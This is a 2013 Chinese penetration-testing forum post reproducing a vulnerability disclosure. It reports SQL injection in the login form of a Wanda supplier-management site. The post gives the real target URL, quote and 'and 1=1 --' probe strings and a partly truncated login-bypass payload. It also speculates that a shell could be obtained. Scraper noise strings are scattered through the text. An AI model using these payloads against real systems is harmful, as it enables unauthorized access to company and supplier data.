中国网络渗透测试联盟

标题: 万达供应商系统SQL注射漏洞 [打印本页]

作者: admin    时间: 2013-3-24 20:16
标题: 万达供应商系统SQL注射漏洞
简要描述:万达某分站sql注入。敏感信息泄露。
+ s! g% }. ?4 R' L详细说明:
+ z/ Y- O- e9 R- v$ L万达scm系统登陆框sql注入。
; A5 T" w; V! F6 t  A+ s- @7 g
/ A; X7 Y. e9 @/ ?http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
4 `: g+ D. J8 O# r. S2 \/ |( l6 V
3 F; O6 ^5 \* ?0 ]8 [
( w7 M0 c) m+ d; T3 _0 ?0 E% E- w: J500错误。+ {0 n" j% f' s8 O) m

* a9 ~7 x. w7 ]: G$ e' A用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
6 d8 W4 n; i' W/ K; O7 a1 y, W- Dhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
- u0 ^" |1 `: j截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
1 W9 m, w0 B+ ]经过分析,登陆验证的过程应该是:7 N1 ?: L- `* T% K" C% ~! w# x

- E5 I0 ~+ b$ [9 w$ P) y取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
3 W% n9 i1 N+ c3 h, shttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
  M  B/ Q$ H' U& z: j1 Y
  o! a( V* Q  zoracle数据库,存在注入点。@大连万达,你怎么看?
+ D/ t' q: @6 Q, h% G& Uhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png; }0 n! K( B% h+ @. Y- x9 F8 \

/ g/ ]1 z) r2 E, U; m系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
6 K8 D  X* j' b8 }- e& Y漏洞证明:
9 y. [& |# f3 A万达scm系统登陆框sql注入。
" B6 w% k% [* ?1 S8 _' f  z7 [7 w; }( r
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%270 p/ w0 N; h3 S" S
. A9 f" [0 i, [- K
  w9 }/ Y6 R7 N, ]
500错误。
" Z) K: ~5 f* {- K+ E6 Z" l/ g8 ^
* G6 L: }$ b& \% ?用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。: ^1 Y9 a! S; W3 M; X$ b
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png1 i4 x0 K+ R' `7 b5 m0 [

6 B3 s; s8 P% Q
. r" X6 P8 Q" |9 B(截图有一点问题)
0 i! K% M- D1 c0 k0 R
/ |- Z# X- l- N3 J" J9 `  t怎么饶都饶不过去;经过分析,登陆验证的过程应该是:" a; B( O! y: e' U. J* B

% [6 W/ j& `! q  n+ }4 h取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
: Q% `: H; ]2 i# C7 u+ v* s( \% ^4 Y+ ~4 f) W$ P4 v1 I8 z
绕过:( b' {- V  \4 ]0 s0 u" g; X
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
2 F" {$ X8 j( v7 u% b7 n6 t
5 B; \! s  [0 X
- C; i' ~" Y5 \5 l7 ]oracle数据库,存在注入点。@大连万达,你怎么看?
! j4 j7 a! U8 Q  E​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。, i, Y8 W0 u/ M% m; [
( P" R$ _: j+ a, Y0 }
修复方案:6 L6 D% H" E3 @8 I6 _
。。。9 \0 n: \/ z6 y# P2 t1 h; P/ l
' e/ o* c3 O/ p, b
) n# {- m  C. f# x" M! v3 C6 m2 Y7 n
厂商已经确认
; G% X1 S6 q5 g4 h8 D# z' m. o! r, d, ~4 c' T! |$ n
[/td][/tr]
, W/ E# H7 [3 N[/table]. R. a4 y) p$ m  ^0 C, C) d
) I( {; t9 l& @3 w
8 c2 G; T$ A5 Q4 j$ ~2 o, F





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2